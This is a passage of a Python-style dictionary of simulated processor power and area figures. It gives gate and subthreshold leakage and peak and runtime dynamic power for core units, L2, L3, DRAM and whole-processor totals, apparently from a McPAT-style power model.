'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.090945,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.38282,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.107994,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.26079,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0243511,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00468532,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0427376,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0346508,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0670886,
'Execution Unit/Register Files/Runtime Dynamic': 0.0393361,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.0959712,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.241133,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.29,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00095396,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00095396,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000857234,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000346254,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000497762,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00326292,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00820552,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0333107,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 2.11885,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.100471,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.113138,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 4.4402,
'Instruction Fetch Unit/Runtime Dynamic': 0.258388,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0416661,
'L2/Runtime Dynamic': 0.0071598,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.36623,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.551646,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0365295,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0365295,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.53873,
'Load Store Unit/Runtime Dynamic': 0.768326,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.0900756,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.180151,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0319681,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0325431,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.131742,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0166212,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.342767,
'Memory Management Unit/Runtime Dynamic': 0.0491642,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 15.2136,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0640563,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00581928,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0557547,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.12563,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 2.49867,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0081385,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.209081,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.0433218,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.0728882,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.117566,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.0593433,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.249798,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.076721,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.04954,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.00818442,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00305726,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0251803,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0226103,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0333647,
'Execution Unit/Register Files/Runtime Dynamic': 0.0256676,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.0550829,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.134527,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.02445,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000791179,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000791179,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000701911,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.00027872,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000324799,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00260907,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00712858,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0217359,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 1.38258,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.0708791,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.0738248,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 3.6682,
'Instruction Fetch Unit/Runtime Dynamic': 0.176177,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0403989,
'L2/Runtime Dynamic': 0.0107702,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 1.78528,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.279433,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0177343,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0177343,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 1.86903,
'Load Store Unit/Runtime Dynamic': 0.384627,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.0437298,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.0874596,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0155199,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0161203,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.0859641,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0116382,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.268733,
'Memory Management Unit/Runtime Dynamic': 0.0277585,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 13.4854,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.02153,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00355053,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0366667,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.0617472,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 1.68553,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328}],
'DRAM': {'Area': 0,
'Gate Leakage': 0,
'Peak Dynamic': 6.0716956857653095,
'Runtime Dynamic': 6.0716956857653095,
'Subthreshold Leakage': 4.252,
'Subthreshold Leakage with power gating': 4.252},
'L3': [{'Area': 61.9075,
'Gate Leakage': 0.0484137,
'Peak Dynamic': 0.305832,
'Runtime Dynamic': 0.0966954,
'Subthreshold Leakage': 6.80085,
'Subthreshold Leakage with power gating': 3.32364}],
'Processor': {'Area': 191.908,
'Gate Leakage': 1.53485,
'Peak Dynamic': 72.1559,
'Peak Power': 105.268,
'Runtime Dynamic': 14.8707,
'Subthreshold Leakage': 31.5774,
'Subthreshold Leakage with power gating': 13.9484,
'Total Cores/Area': 128.669,
'Total Cores/Gate Leakage': 1.4798,
'Total Cores/Peak Dynamic': 71.85,
'Total Cores/Runtime Dynamic': 14.774,
'Total Cores/Subthreshold Leakage': 24.7074,
'Total Cores/Subthreshold Leakage with power gating': 10.2429,
'Total L3s/Area': 61.9075,
'Total L3s/Gate Leakage': 0.0484137,
'Total L3s/Peak Dynamic': 0.305832,
'Total L3s/Runtime Dynamic': 0.0966954,
'Total L3s/Subthreshold Leakage': 6.80085,
'Total L3s/Subthreshold Leakage with power gating': 3.32364,
'Total Leakage': 33.1122,
'Total NoCs/Area': 1.33155,
'Total NoCs/Gate Leakage': 0.00662954,
'Total NoCs/Peak Dynamic': 0.0,
'Total NoCs/Runtime Dynamic': 0.0,
'Total NoCs/Subthreshold Leakage': 0.0691322,
